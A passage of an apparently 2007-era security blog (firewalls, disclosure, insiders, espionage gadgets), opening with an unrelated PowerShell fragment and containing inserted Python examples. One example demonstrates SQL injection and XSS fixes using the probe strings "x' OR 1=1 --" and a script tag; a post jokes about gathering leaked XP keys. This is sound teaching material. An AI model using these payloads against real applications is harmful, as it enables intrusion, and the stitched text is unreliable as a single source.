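# The same idea with one stray line of output before the return.
$noisyWorker = {
    'starting'          # a bare string goes to the output stream, so the caller receives it too
    return $true
}

# Robust caller: collect everything the script emits, treat the last item as the result and
# anything before it as log noise instead of letting it masquerade as the return value.
function Invoke-Worker {
    param(
        [Parameter(Mandatory=$true)][scriptblock]$Script,
        [object[]]$Arguments = @()
    )
    $out = @(& $Script @Arguments)
    if ($out.Count -eq 0) { throw 'worker produced no output' }
    $log = @()
    if ($out.Count -gt 1) { $log = $out[0..($out.Count - 2)] }
    New-Object PSObject -Property @{ Result = $out[-1]; Log = $log }
}

# Usage:
$r = & $worker 'good'
$r.Success                                          # the object came back intact

$r2 = & $noisyWorker
$r2 -is [array]                                     # the flag is now buried at the end of an array

(Invoke-Worker -Script $noisyWorker).Result         # Invoke-Worker digs the flag back out
(Invoke-Worker -Script $worker -Arguments @('bad')).Result.Success
```

Returning an object with a Success flag and a Message, rather than a bare $true, also gives the caller something to log when the worker fails, which a single boolean never does.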
    .: security requires imperfection
    Yup, it's still a thinking week! Rybolov has joined in posting about security vs a zero-defect perception.
    Of course, what does this have to do with security? Well, in most companies and the government in particular, you’re trying to project a zero-defects image to your customers. That’s the way the business and marketing side works. Marketing and security don’t mix precisely for this reason: one is trying to project an image of perfection, the other needs understanding of flaws and risks in order to make informed decisions.
    Yup! That's why people get their faces all scrunched up when the security guys say, "well, we could still be penetrated by a really skilled hacker..." They want zero-defect perfection; a state where they can sit back and be ultimately secure, even if they realize technology changes they still want some state of secure for the now. We actually require the imperfection in order to evaluate and improve (and prove!).
    .: laptop users who replace their hard drives
    Do your laptop users complain about lack of admin access when on the road and trying to install a new printer or some such device? Are you *sure* they're not just buying their own laptop hard drive, replacing the corporate one with their own, and running anything they want?

    Of course, should you care?
    .: the application aware firewall
    DarkReading has an article up about next generation firewalls including true IPS and application awareness. First, read the article.

    Second, the inadequacy of firewalls that only go by ports has been known for what, a decade now? And the trend of applications moving over port 80 is about as old. I just don't like reading "news" about such ideas. But that's my only real complaint on this article.

    This is all an interesting topic; getting firewalls more in touch with the applications, and as Hoff suggests, getting more in touch with the data. "Even so, giving the firewall an application protocol view still isn't enough, security experts say. 'The problem is that applications are merely conduits. Data is the real problem,' Hoff says."

    Unfortunately, 20 years from now, will we be saying this new next gen application firewall with its signatures and traffic inspection is yet another colander, where all applications not only tunnel through port 80 and use the web browser, but also avoid known bad signatures? Will this be any better than blacklisting traffic/domains/ports and trying to keep up with them? Perhaps, perhaps not. But technology has moved more emphasis on applications (or even just one application: the browser), and thus firewalls (and security) need to keep up.

    Regardless of the effectiveness or IPS-like ability of such firewalls, we still cannot begin to replace a human analyst looking at such gathered data. And we can't begin to properly protect the networks without being able to inspect application traffic. We can't stop what we don't know is happening. If nothing else, I welcome the day when firewalls will be able to be their own IDS, with the ability and accuracy of a best-of-breed standalone IDS.
    .: linux networking cookbook
    Today at the bookstore I ran out of magazines to browse over lunch, so I meandered to the book section and picked up Linux Cookbook by Carla Shroder. I really enjoyed the parts I skimmed through, both her style of presentation (excellent!) and the subject matter itself. Very good stuff! Unfortunately, the book is getting dated, and I just really can't justify buying a dated book when many of the topics I could find updated through Google.

    Still, I really do like to find recent material on authors whose style I really dig and really works for me. I saw she did some weblogging with O'Reilly, meandered over there, and I see she has a brand new book out, Linux Networking Cookbook. Oh my, right up my alley! If her style of writing has not changed, I will be picking this book up from BookPool once it is available. I may actually pre-order it now to get the current sale discount... I really like the "cookbook" style books from O'Reilly. I totally enjoy being able to put a book on my desk, and look up various things that I want to do or learn at various times; as opposed to reading a book cover to cover.
    .: document your code
    Over on Chris Shiflett's blog is a guest post from Elizabeth Naramore, php/web developer, in which she talks about commenting and documenting code, using a dishwasher as a common analogy. The post is well-written and can apply not just to code documentation, but security process documentation as well. Many of my colleagues hate doing documentation and as such we have painfully little of it, but I'll always do my best with it because I think it is especially valuable. I think some people think it is so simple, they never get around to it, and as such, this "simple" thing never gets done.
    .: has security gently guided technology development?
    Does information really just want to be free? Or systems that is?

    In the beginning we had ports on systems running their own services. Port 80 had HTTP. We blocked ports we wanted to stop.

    Then services started tunneling themselves through port 80. We started inspecting traffic over port 80 and denying what was obviously an improper request, usually HTTP. We even added software installation denials.
    Applications started going to the web, because then they look like the normal HTTP traffic we didn't want to block, and used an application on the desktop they knew we couldn't fully deny. We need more application-aware blocking (deeper inspection, HIPS, and even DLP types of technology).

    Soon, I suppose Google will offer up the OS on the web, and we'll connect to a portal that will offer us everything we need, a veritable AOL "walled garden" on the web. What then? Vista is portending the death of the OS as we know it...right? A return to dummy terminals, only this time enabled on the Internet through the browser?

    Is security to blame for part of this? (Let's say we do get back to client-server types of architecture, does that mean we're done with endpoint security because the endpoints will become expendable plastic? Will the Web OS go the way of AOL? Sure, it may eventually offer a ton, but do users really want the freedom to do what they want, even if those choices and risks are bad? Do you want to decorate your house one way, and just adhere to slim building and fire codes or rather have a cookie-cutter home with small cosmetic differences? Ahh...)
    .: wireless pocket reference card
    Just a quick link to a 2-page pocket reference card [pdf] from Joshua Wright for 802.11 headers, wireshark filters, and kismet keys.
    .: training the technologists
    As this year has gone by, one thing has become pretty solidified in my mind: training for security and IT/developers is necessary. I'd rather have training for them than for users in general. Not all security measures can be adopted in every organization, so they need not just technical training, but training to be aware of the risks and how they affect the business needs. For instance I can see some organizations thriving while users run as local admins. Why? Because the risks are known and dealt with in other, often-times more creative ways. And yes, this may incorporate user awareness training. I'm not against user awareness, I just put it lower on the priority list.

    If you can't build things securely, or secure them accurately and quickly, then business needs will almost always win over security. From tasks to projects to software.

    One might think training should be for manager levels as well. But I would counter that managers can learn a hell of a lot from their employees, with good, trusting communication.
    .: ron paul spam event research
    An interesting look at the Ron Paul spam event a month ago, including the web interface for the Ron Paul spam job.
    .: fake web filter pages
    April Fool's Day idea for sites bigger than mine: Replace the site front page with a fake Websense/SurfControl blocked message and get everyone to ask their admins what's up. "I swear, we're not blocking it! I don't know what's going on!"
    .: helping home users be more secure: just a dream?
    I started out the week pointing towards people doing some thinking. I figure I'll end the week the same way.

    Bruce Schneier posted an article about home user security knowledge I really like, since I've been saying the same thing, roughly.
    At work, I have an entire IT department I can call on if I have a problem. They filter my net connection so that I don't see spam, and most attacks are blocked before they even get to my computer. They tell me which updates to install on my system and when. And they're available to help me recover if something untoward does happen to my system. Home users have none of this support. They're on their own.
    Absolutely true. When I purchase a car, do I have a manual on how to tune and maintain it or troubleshoot it when things go wrong? Do I even get to see the standard specs for safety and security? Hell, do I get a lesson in changing my oil? Nope. And we expect people to "get" the much more ephemeral workings of a computer when not everyone has nearly the logical mind that most techies have? Yikes!
    If we want home users to be secure, we need to design computers and networks that are secure out of the box, without any work by the end users. There simply isn't any other way.
    I agree, although that doesn't mean we should dump user awareness totally. But really, corporations (and us geeks!) need to buck up and help their own employees at least a little. Training at work about security and computer usage will carry over into their home life. If nothing else, perhaps they can bounce home computer questions off the cyber talent present in the organization. I know us techs hate troubleshooting home PCs, but giving free advice is not nearly as painful.

    What digs at this approach, however, is while advice is free, most people just want someone else to do it and do the thinking, the dirty work. Not everyone is into computers as much as us geeks, and they simply don't want to be. Just like I don't change my own oil, and really don't want to be troubled with it, despite how necessary it is to protect my investment. Anything beyond "don't install random things," and "don't click links in email," is still too much to trust most end users to understand.

    Sadly, we have a huge computer security industry now, and they simply will not let someone like Microsoft put out a solid, more secure OS. Which puts us in a real bind... In the end, insecurity may just be a permanent reality, just like crime in general is a permanent reality, or home insecurity is a permanent reality (when assuming cost is realistic).
    .: full disclosure has definitely become more domesticated
    Jeremiah Grossman has written about how Full Disclosure is dead. Good article, and some interesting comments on his blog.

    Is FD dead? Well, not really, but even as attackers have criminalized to realize profit, so too have "researchers" grown up and realized they can get jobs doing this fun hacking stuff. With jobs comes some professional integrity, maybe not just with proper disclosure, but with not getting into legal trouble and becoming the next rogue IT admin plastered around the presses. Heck, some of these guys get jobs for their silent disclosures, or money for reporting them and shutting up (a sort of legalized form of extortion or ridiculously cheap labor, take your pick).

    We can also see this with far fewer people hiding behind aliases, and likewise in the number of hobbyist security persons.

    Is FD dead? I don't think so, but the pool of people who *can* provide FD has greatly diminished. Should FD die? No, because in many cases I prefer FD to staying hidden in the darkness of naivety. We certainly need it, and if FD does ever appear to die, I'll be willing to bet yet another cyclical counter-counter...counter-culture will emerge fighting against The System and not playing as complacently as the rest of us aging geeks are doing.
    .: insecure backup tapes lead to measures that don't secure backup tapes
    An article on ComputerWorld illustrates why I don't care for media rags and prefer news straight from security professionals (blogs, email, etc).
    State officials announced late last week that they have agreed to purchase about 60,000 licenses of McAfee Inc.'s SafeBoot encryption software.
    Ohio officials moved to launch a hefty security policy makeover after a backup tape containing Social Security and other personal information of residents was taken from the car of a government intern in June.
    What's wrong with this picture? Well, even the article lists the features of SafeBoot, and they don't include encrypting backup tapes. So this is a misleading article that any knowledgeable IT staffer in Ohio has to be a bit annoyed about. That's also a hell of a lot of licenses. I wonder how long and how painful that roll-out process is going to be...

    It also goes to show that while Ohio may have some policy, process, and people problems when it comes to digital security (and have maybe addressed them!), the measures that seem easiest to do and report on are technological controls like the purchase of yet more software to patch the problems. Reminds me of conversations about internal security. "Upper management would rather not think about internal employees being malicious; they want to trust and empower them, not treat them as potential criminals." Hence, technology is a far easier pill to swallow for such paradigms...
    .: protecting insiders from social engineering
    Saw posted on NoticeBored a link to an August 2006 Microsoft paper describing measures to combat social engineering. It's a 30+ page paper that goes over quite a lot of different classes of social engineering tactics like phishing, web page exploits, service desk calls, and even in-person conversation which reminds me a lot about secret Tradecrafts... Linked for my own future reference.
    .: pandora radio from the music genome project
    Pandora is a free (hopefully it stays free!) streaming music service that sends out music based on your preferences, kinda like a Netflix queue that adjusts as you rate music. You start out by picking some artist or band whose style you want to listen to, and the system provides the rest.

    You can listen to a few songs before being nagged about registering. You can then register for free and supply whatever information you want; there was no email validation or anything.

    It worked great at home on Ubuntu + Firefox. I was in an electric mood so I chose Underworld as my initial seed and got a nice 3 hours' worth of decent music with one exception of some Nickelback-sounding pop rock song that came in. No idea how it got in my list, but you can click a "thumbs down" for any song. It'll log your preference and skip right to the next one.

    I really dig SomaFM.com's Groove Salad, but Pandora will definitely vie with them for my web radio pleasures as long as they stay free and have as varied a mix as they seem to have at first blush. If they do, this truly is the future of "radio" and music exposure. Much like the past decade and more where I've expanded my tastes and horizons through mp3 sharing (and thus spent money on those I liked!), this is serving me up that same benefit without the hassle of finding, downloading, and sorting it all myself.
    .: scanning those other wireless technologies beyond 802.11abg
    Josh Wright earlier this year posted a couple wireless security papers which are quite valuable. First he talks about wireless framing; basically a blitz through how wireless 802.11 works. There is also a paper about 5 wireless threats we may not know about. In the list, Wright mentions 802.11n (Greenfield mode) and Bluetooth rogue APs. I think scanning for rogue APs using kismet is becoming fairly common in concerned organizations (or by concerned geeks anyway). But how does one begin to scan to find these other wireless technologies?

    BTScanner can be used, plus there are other papers on pentest.co.uk.

    Bluescanner should also work, although I'm not sure if this is the same tool that was absorbed into Aruba Labs...

    I'm sure there's more, I'm just not coming up with them at the moment.

    AirMagnet's Laptop Analyzer will detect 802.11n signals. I'm not sure what else is available out there for this new tech.

    I'm sure pretty soon there will be scanners for detecting vulnerable wireless keyboard/mice devices (pdf) as well...
    .: upgrading from vista to xp
    Not sure where I found this, but this blog reviews the upgrade from Windows Vista to Windows XP (yes, that's worded properly). Nice read! I'm still eyeballing parts for my 2008 gaming machine that I plan to build early next year, and I've really not been sold on getting a Vista license with it. I may as well stick to XP since I know everything will work just fine with it, and I don't have any need for the graphics or security enhancements since this machine only does one thing: play games. The only real reason I would want to use Vista is to be familiar with the OS and support it if users have questions. But maybe I'll not sweat that until my company decides to migrate to it...

    For the system itself about the only thing I've not decided upon is the case and cooling, and the little bells and whistles that come with them.
    .: a guide to linux services
    This post talks about various Linux services in Fedora and Ubuntu (Debian) systems, along with a recommendation on turning them off or not. I really like knowing more about some of the mysterious services running. Normally with Linux, I wouldn't do the whole "Windows thing" about disabling services because they start on their own, but with Ubuntu I think there is plenty of extra stuff that can be turned off with no ill effect. This might help guide me a bit.
    .: a security interview question
    Every now and then I'll see a post about interview questions for geeks...I mean, IT employees. One question that just came to mind involves a security position, or one that requires a person who has security in mind.

    You have the following services known in your organization. Where/How do you look to keep current on the security issues in these services? Cisco, Microsoft Windows Servers, XYZ ticket system with ABC modules, Skype for IM/VOIP, HP laptops (chosen for a reason), Fedora/BIND DNS servers, IE6 as only desktop browser, and so on...

    The obvious first answer all IT persons should give is the manufacturer's website for patch releases and advisories. But the real security-minded people will know how to go beyond that. For Windows, there are any number of ways to view security releases, either by WSUS, MBSA, or many dozens of sites that post about them every month. Securiteam, Bugtraq, Full-Disclosure, Secunia, and various other vulnerability disclosure sites have RSS feeds and/or mailing lists that discuss or announce various issues, sometimes in advance of the manufacturers having fixes out. Further knowledge of services like McAfee's internal threat announcement system can be a bonus as well, especially if it pertains to what you have already deployed in your environment. "Omigosh, they already know about Snort and how to properly update and read new signatures! They're relevant to me already!" And yes, the ability to subscribe to Bugtraq is one thing, but can they pick out the necessary information from the non-interesting stuff? Do they know the Linux teams regularly post out their advisories there? And so on...
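    The "pick out the necessary information from the non-interesting stuff" part of the question is the bit that can actually be automated. Here is an added example (my own illustration, not something from the post or from any of the feeds named above) that parses an RSS 2.0 advisory feed and keeps only the items mentioning products in a local inventory. The feed text and the inventory are constructed for the demo; a real run would fetch the feed from one of the sites above and load the inventory from wherever you track assets.

```python
"""Filter a vulnerability advisory feed against a local asset inventory.

Added example, not from the original post. Parses an RSS 2.0 feed and
keeps only the items that mention a product we actually run, which is
the triage step the interview question is really asking about.
"""
import re
import xml.etree.ElementTree as ET

# Constructed inventory (assumption for the demo): product keyword -> deployment.
INVENTORY = {
    "bind": "Fedora DNS servers",
    "skype": "desktop IM/VoIP",
    "internet explorer": "only desktop browser (IE6)",
    "windows server": "file/print servers",
}

# Constructed sample feed mimicking an RSS 2.0 advisory list; not real advisories.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Sample advisories</title>
<item><title>ISC BIND 9 cache poisoning advisory</title>
  <link>http://example.invalid/adv/1</link>
  <description>Affected: BIND 9.x recursive resolvers.</description></item>
<item><title>Skype client arbitrary code execution</title>
  <link>http://example.invalid/adv/2</link>
  <description>Crafted URI handler. Fixed in the current release.</description></item>
<item><title>Some PHP forum package XSS</title>
  <link>http://example.invalid/adv/3</link>
  <description>Not deployed here.</description></item>
<item><title>Microsoft Internet Explorer 6 memory corruption</title>
  <link>http://example.invalid/adv/4</link>
  <description>Monthly bulletin, client-side fix.</description></item>
</channel></rss>"""


def parse_feed(xml_text):
    """Return a list of (title, link, description) tuples from RSS 2.0 text."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        items.append((
            (item.findtext("title") or "").strip(),
            (item.findtext("link") or "").strip(),
            (item.findtext("description") or "").strip(),
        ))
    return items


def relevant_advisories(items, inventory=INVENTORY):
    """Keep items whose title or description mentions an inventoried product.

    Matching is case-insensitive on whole words, so 'bind' does not match
    'binding'. Each hit records which product matched and where it is deployed,
    which is what you need to route the advisory to the right admin.
    """
    hits = []
    for title, link, desc in items:
        text = f"{title} {desc}".lower()
        for product, deployment in inventory.items():
            if re.search(r"\b" + re.escape(product) + r"\b", text):
                hits.append({"title": title, "link": link,
                             "product": product, "deployed_as": deployment})
                break  # one match per advisory is enough for triage
    return hits


if __name__ == "__main__":
    for hit in relevant_advisories(parse_feed(SAMPLE_FEED)):
        print(f"[{hit['product']}] {hit['title']} -> {hit['deployed_as']}")
        print(f"    {hit['link']}")
```

    Of the four constructed items, the PHP forum advisory is dropped and the other three come back tagged with the system they affect. The whole-word match is deliberate: an inventory keyword like "bind" would otherwise light up on unrelated advisories.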
    .: accuvant security news
    In case you don't see these, Accuvant has a regular security news posting called Five Minute Security Digest that has some info and links to various articles posted online. You can subscribe from the top of the page if you like these emails.

    The last story is a link to a Google search for Belarc Advisor reports posted on the public nets. Whee, I could always use extra Win XP keys for my old test systems!
    .: bejtlich on does failure sell
    I can't imagine anyone that may read my site doesn't read Bejtlich's blog, so this post is just a reference for me. Bejtlich has posted a thoughtful blurb dealing with several very poignant issues that I firmly agree with. I know digital security has several absolute Laws (no silver bullet, you will be intruded, etc), but some of the included topics of the post are what I would call Demi-Laws or sub-Laws; things typically true and should be kept in mind in any digital security situation.

    - management by belief (I think a Bejtlich term) increases up the organizational ladder; i.e. as one gets away from operations and hands-on day-to-day. The real pulse of an organization's security rests with the incident responders and operations guys.

    - somewhat related, the bar of acceptable security likely rises as one decreases down the organizational ladder to the operations guys. The techs typically can't accept risk, whereas managers can; thus operations tend to be far more difficult to satisfy.

    - management does not like hearing "yes, we spent $xxx on a security technology but it is still not ensuring our complete security in even that field." Security requires a different definition of success which we need to explain at every opportunity.

    - digital risk is much less obvious to see; compare "network is slow" vs a SQL injection error leading to database leakage through your website.

    Everyone should be asked the point blank question Bejtlich asks: Do you believe all of your defensive measures are 100% effective? One of my top Laws is security will fail. We have to accept that, and then the answer becomes apparent and we can move forward without living in some warped rose-colored reality.

    Do you know how often people know better about some topic, but feign ignorance? Sometimes it's when they find out, sometimes it's to themselves. It's an interesting psychological issue... I think our culture tends to have this pull towards living in some state of ignorance about most things...
    .: seven fundamental info tech career questions
    Saw this posted by Ben Rothke: Lee Kushner, founder and CEO of the information security recruitment firm LJ Kushner and Associates, writes about fundamental IT career questions. It's nice to see that I've asked myself this same battery of questions the past few years, albeit in different ways and words. It seems a very common sense and effective approach.

    1. What are my long and short term plans?

    2. What are my strengths and weaknesses? Both soft and technical strengths and weaknesses.

    3. What skills do I need to develop? It seems more appropriate to say "want" instead of need. If I want to develop the skills I also need, I'm in an appropriate career for my happiness goals.

    4. Have I acquired a new skill during the past year? This is great for revising a resume or evaluating a current job. I like to separate this between new skills learned on the job and new skills learned on my own.

    5. What are my most significant career accomplishments and will I soon achieve another one?

    6. Have I been promoted over the past three years? Promoted or given raises would be my take on this.

    7. What investments have I made in my own career?
    .: on troubleshooting and incident response
    I'm not afraid of storms, for I'm learning how to sail my ship. -Louisa May Alcott
    .: security's top five priorities
    DarkReading recently posted Security's Top Five Priorities. I wasn't going to post on this, but my manager made this a homework assignment as we're going to discuss it at our team meeting today, so here's some notes.

    1. The Portable Problem - We can encrypt everything: PCs, thumb drives, portable devices, backup tapes. This should also deal with things (data) leaving our control and things (data, devices) coming into our control. Data Leakage Prevention may be a good logging mechanism on what is leaving, and device port control may help control things coming in. I'm not personally sold on NAC/NAP, although...

    2. Web Two Point Zero-Day - Nice title! I think the authors missed making the distinction between two very important veins in talking about Web 2.0 attacks: serverside concerns and userland concerns. Serverside concerns deal with fixing up the issues in web applications and making sure they are not opening holes to internal footholds or data that external users should not have; SQL injections, XSS, file executions, and so on. Userland deals with better assurance that users wielding a browser as they surf a website are not going to get pwned or catalyze a site-wide pwnage. Proper SDLC, developer education, and regular audits will help serverside issues. Userland issues are much more difficult: endpoint security, browser and OS hardening and possibly even tools like NoScript, web filtering, gateway malware detection; user education about best practices as well as education on data leakage by posting confidential stuff to the Internet.

    3. Attacker Inside! - Monitoring and logging, i.e. an audit trail, is paramount when it comes to detecting/preventing insider attacks. Database access monitoring, least privilege when it comes to network and data access (as opposed to OS access), and separation/rotation of duties could help. Likewise, making sure "small" security breaches that go against policy are truly dealt with, as opposed to ignored such that it creates a bad slippery slope.

    4. Endpoint End Game - This is the big one these days. From encryption of the device to OS hardening, HIPS/firewall, device restrictions (USB...). This is also where user education comes into play, teaching users about the risks of using wireless, laptops, what data is important, social engineering issues, software policies (P2P), and what to do on laptops when away from our more secure network where web filtering and gateway controls won't block malware from malicious sites.

    5. Botnet Bugaboo - There's far less we can do about botnets than the other four issues, but as I've long predicted, they are a very real specter looming over the Internet. A lot of power that has thankfully not yet been wielded in a way that impacts me too much. We do have two things we can do. First, prevent PCs from becoming part of a botnet. This should include detection of C&C communications through IDS/IPS. Second, perhaps think about a strategy for responding to a DDoS attack, either directly to us or affecting us as collateral damage (we're amplifying it or part of the same ISP block). The former doesn't seem to require anything beyond endpoint and network security in general, and the latter is still pretty "out there" to be a huge priority beyond just thinking about it. I think ISPs, public networks, and security researchers/products have more to worry about here.
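    On the serverside half of item 2, "fixing up the issues in web applications" mostly comes down to two habits: never splice user input into query text, and escape it before it goes back out in HTML. The following is an added example of my own (not code from the DarkReading article or from this post) showing the SQL injection and reflected XSS cases side by side with their fixes. It runs against an in-memory SQLite table of made-up users, so nothing here reflects any real application.

```python
"""Serverside Web 2.0 hygiene: the injection-prone version beside the fix.

Added example, not from the original post. The users table and its rows
are constructed for the demo. The 'unsafe' functions are kept only to
show what the fixed versions prevent.
"""
import html
import sqlite3

# Constructed demo data: two ordinary staff accounts and one admin.
USERS = [("alice", "staff"), ("bob", "staff"), ("carol", "admin")]


def make_db():
    """Build the throwaway in-memory database the demo queries run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_unsafe(conn, name):
    """The 'before': user input spliced into the query text.

    Whatever the caller passes becomes part of the SQL, so the
    AND role = 'staff' restriction can be commented out or bypassed.
    """
    sql = "SELECT name FROM users WHERE name = '" + name + "' AND role = 'staff'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """The fix: a bound parameter. The input is data and can never change
    the query's structure, so the role restriction always holds."""
    sql = "SELECT name FROM users WHERE name = ? AND role = 'staff'"
    return [row[0] for row in conn.execute(sql, (name,))]


def render_greeting_unsafe(name):
    """The 'before' for reflected XSS: input echoed straight into markup."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    """The fix: entity-escape the input so it renders as text, not markup."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR 1=1 --"           # a textbook tautology plus a SQL comment
    print("unsafe:", lookup_unsafe(db, probe))   # every row, admin included
    print("safe:  ", lookup_safe(db, probe))     # no such user, empty list
    markup = "<script>alert(1)</script>"
    print("unsafe:", render_greeting_unsafe(markup))
    print("safe:  ", render_greeting_safe(markup))
```

    The point of keeping both versions on the page is the audit step the item mentions: a reviewer grepping for string-built SQL or unescaped template output finds exactly the `lookup_unsafe` and `render_greeting_unsafe` shapes, and the fix in each case is a one-line change.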

    .: three free credit reports every year
    I knew US citizens got a free yearly credit report, but I didn't know I could get one from each major bureau. I saw this at Security Operandi, and there are links to get reports at the bottom of the post. As he states, the best way to combat identity theft and fraud on a personal level is to monitor your credit report and statements closely.
    .: corporate espionage tricks and tools
    For Christmas, Andrew Hay linked over to a SANS paper by Shane W. Robinson, Corporate Espionage 201. Excellent little paper, and I thought I'd pull some info out and post it.

    The idea of using Netgear XE102 devices to deliver ethernet over electrical lines is interesting, but I didn't know it had gotten this far. For under $100, one can get a pair of these and start experimenting. Pretty soon we're going to need some electrical outlet monitoring devices to listen for these signals being passed...

    Silex has a SecurePrint device which will hold print jobs until the requestor walks over to the shared printer and is authenticated via their fingerprint. This seems to run around $500, which is a bit expensive for me to buy as a simple home toy, but might be justifiable if you can get dedicated printers out from HR/execs/managers/account managers and get them to securely use a workgroup printer. Still, if there is any issue with workgroup printers holding possibly confidential information in their print tills for too long, or grubby fingers picking up other people's pages, this could be pretty useful.

    DriveLock does what it sounds like it would do, especially when paired with the context of mobile laptops: locks down ports and drives. No idea how much this runs or even how truly effective it might be in a corporate setting, but I know we and many others are still wrestling with how to tackle device security on this level.

    TrackStick is a GPS logger which can be attached to a car, left to log the driver's travels, and then loaded into GoogleEarth or other programs. Just a small hop below real-time GPS locating technology. Can be found on Amazon for roughly $200, and others can be found by searching for "vehicle tracking." I guess parents can use this to track their kids, eh? Jealous adults can track their significant others, and corporate spies can use this to profile assets. I wonder if the old concept of a surveillance society included the idea that everyone can surveil everyone else!

    The LogiCube Sonix or Forensic Talon will provide fast media/drive duplication for well over $1000. Until encryption becomes widely used, it can be very exciting (or sobering) to think about what can all happen to a media device in an unintended party's hands...

    And to drive home the need for device port security, you can get a wristband that looks a heckuva lot like the "Be Strong" wristbands, but packs a USB port inside it. Load up your favorite USB-capable distro...
    .: searching for people info online
    Want to look someone up? Well, this blog post doles out some links to some fun people searching sites. As much as I'd like to say it found me out, there are quite a lot of people who share my name, and the only information I found on me was dated at least 4 years ago. Almost tempted to add this as a "people search" menu item on the right...but not really sure I'd use it unless I was a hiring manager or something....
    .: parallel thought of the day: rfid vs internet search
    You use Google as your search engine, and you do searches for all sorts of stuff from your home connection with a predictable IP address. The resultant data kept by Google will likely eventually be sanitized with a unique identifier that won't be tied to you. But as we've seen in the past, we can analyze all the searches I've done with that unique identifier and create a very real profile of me. You'd likely find my habits, purchasing trends, roughly where I live, and so on.

    With RFID still being talked about, can you still have a problem with encrypted RFID tags or passports and such? Sure. While I might walk around with my RFID-enabled passport, various stores I shop at won't be able to decrypt my passport information, but what if they could detect and copy it? They can track me without really knowing me. Get a wide enough subset of data by someone/something that can get long-range detection, and you can easily see where I work (I spend 8 daytime hours there), where I live (I spend 14 evening hours there), where I go to lunch, and my favored shops...

    I wonder when cell phone tracking will become a marketing data set? It's on me all the time and it is on. You can see every place I go by tracking it...again, even if you don't know me.

    Without knowing me, you can still know me...and given the ease of reading RFID devices and/or cloning of them... Hrmm...I bet in ten years I could get a Harry Potter-esque clock that lets me know when my kids are within proximity of my house and pop their portrait out when they're home.
    .: wireless keyboard eavesdropping
    In case you've been too busy to keep up with the popular news, a video has been created where several wireless keyboards were recorded and their keystrokes decrypted. Nice video, and of course I'd love to get my hands on the gear/software.
    .: user awareness password training video
    WatchGuard has produced a user awareness training video dealing with good password habits. A good quality video, although I don't think we need to bug users' eyes out with 14+ character passwords. With proper regular rotation (60 days), they don't necessarily need to be insane lengths unless the accounts are especially sensitive.
    .: policy compliance walkthroughs
    Andy ITGuy posted a picture of a login and password taped to a keyboard. Awesome! So, how does one combat this besides just waving the policy around (since I'm not gonna bet my salary that that will work)?

    First, I love the idea of walkarounds. I know it sounds juvenile, but some night do a walkaround inspection of the premises, especially cubicles/workplaces. This can be done in phases of small random samples, as well.

    Second, document and fix any mistakes. That login information on the keyboard? Photograph it and remove it and destroy it. That way the next time someone needs to get on there, they have to ask someone or make a cognizant effort to recall the information. That might be all the goading they need!

    Third, maybe write up people who break the rules, but that is difficult at times to get managers and HR to get behind and put some teeth into. Instead, dock teams of people (or departments) points for policy breaks and reward the teams who break the least rules. Give em an extra day off, a pizza lunch, or whathaveyou. And no, a luncheon with the CEO is NOT a reward (yes, I've seen that!). Make it something people want just enough to add a little social pressure to comply. And try to keep it on the positive side of conditioning.
    .: links for further reflection
    Some topics in the security field are important enough to always be visited, even if a solution or consensus is not met. Such topics can lead to formulating entire paradigms on how we approach our daily security decisions personally and professionally. In fact, these discussions are important to me whether I agree with them or they run fully counter to my own views and I certainly do love bookmarking excellent essays.

    Kurt Wismer has recently posted a couple such topics that I think are especially important to keep in mind. First, Kurt talks about why vulnerabilities are just never going to go away, and what that means to our approaches. Second, he probes the question on what average users need to know about their computer security.
    .: top infosec risks and threats and lions and tigers
    I like this list of threats and risks and whatnot from the CISSPForum [pdf]. It is a small 8-page document (1 page intro, 2 pages references and closing) which is a nice blitz on the topic. I really dig that each section is a printed page, so can be easily posted and/or digested over time. Totally recommend reading it through once.
    .: fax thermo ribbon and port bunnies
    I watched fabs' presentation on Advanced Port Scanning at the 24c3 (that looks like a heckuva venue!), so thought I would poke around and see if Port Bunny had been released yet. Basically this should be a simple TCP port scanner that can scan faster than nmap; the presentation goes into the reasons why. It doesn't look like the tool is out yet (and I'm patient so will wait for the official release in January), but I did find a post from FX on the Recurity Lablog about retrieving faxes off a spent thermo transfer ribbon from a fax machine. Information hides in interesting places!
    .: generation y in the workplace
    I'm not big on generalizations, but let's face it, they happen. I clicked through to a ComputerWorld article on how Generation Y are the biggest users of our libraries. Neat. This prompted the question: "What the hell is a Generation Y person?" I was born in '77, so I'm on the nebulous border between designations, but from reading a rather interesting article on Wikipedia for Generation Y, I tend to fall more into Y due to my technological inclinations. Labels aside, it is at least interesting to see how the workplace culture is changing with a generation of young people, whom I still consider myself to be a member of.

    .: theme song for 2008
    Mike Rothman picked a theme. Even shrdlu picked a theme. Should I lay early claim to "Aenima" by Tool?

    Some say the end is near.
    Some say we'll see armageddon soon.
    I certainly hope we will.
    I sure could use a vacation from this
    Bullshit three ring circus sideshow of freaks.

    No, I'm not quite that negative at the moment. Being at work and not having a legit means to browse my music collection, I'll have to put this topic on hold and listen for a candidate song over the next few days or week...if I even do come up with something interesting.
    .: get things done; create something
    I do read a few non-security blogs, and sometimes they offer sage advice. A post by Samuel from WakeUpLater.com (if you freelance/work-for-yourself you can wake up later) has a few excellent points (although I will argue his title doesn't match the text).

    The title of the post is Stop Reading Blogs: Go Create Something. I know from all of the blogs and sites I read regularly, I get such a huge influx of cool things and tools to use, that I end up trying out less than if I just had a shorter queue and more time to try them. My gmail box is overflowing with stuff to check out from the past year. Reading blogs is helpful, but I'm the last person to ever say I know Topic FGH just because I read about it online. I think I'll make a point this year to start culling my list of useful blogs that I read, or at least organize them in a more tiered fashion from Must Read to Only If Bored.

    The post also goes into writing, Stephen King, and reading. I really love this, and I do have a special place in my heart for reading and writing. Find a space that is yours and free of distractions. Get something done. Get started and the hard part is then behind you. Do it for yourself, not others. (If you do it well, the part about the others will find its own place.)

    This past year has been the first time I've had an apartment to myself, and I'm now pursuing outfitting the second bedroom to be my little workspace conducive to all of my geeky endeavors.
    .: 24c3 and bhusa2007 videos are posted
